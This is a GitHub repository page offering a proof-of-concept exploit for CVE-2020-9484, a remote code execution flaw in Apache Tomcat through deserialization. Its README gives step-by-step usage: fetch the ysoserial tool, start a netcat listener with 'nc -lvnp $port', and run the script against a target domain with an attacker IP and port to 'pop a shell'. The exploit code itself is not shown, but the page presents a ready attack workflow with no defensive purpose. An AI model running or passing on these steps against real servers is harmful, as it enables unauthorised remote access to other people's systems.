Skip to content

VICXOR/CVE-2020-9484

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 

Repository files navigation

CVE-2020-9484

POC for CVE-2020-9484

Logo

POC for CVE-2020-9484

Apache Tomcat RCE by deserialization (CVE-2020-9484)
Explore the docs »

Getting Started

1. Clone this repository, then you will be able to use CVE-2020-9484 and modify the source code if needed.
2. Download ysoserial jar
3. place both CVE-2020-9484 and ysoserial.jar in the same directory
4. pop a shell!

Usage

A simple bash script has been written in order to streamline the usage of CVE-2020-9484.
Upon Exploitation you will need to have a netcat listener ready

nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port

CVE-2020-9484

Releases

No releases published

Packages

No packages published

Languages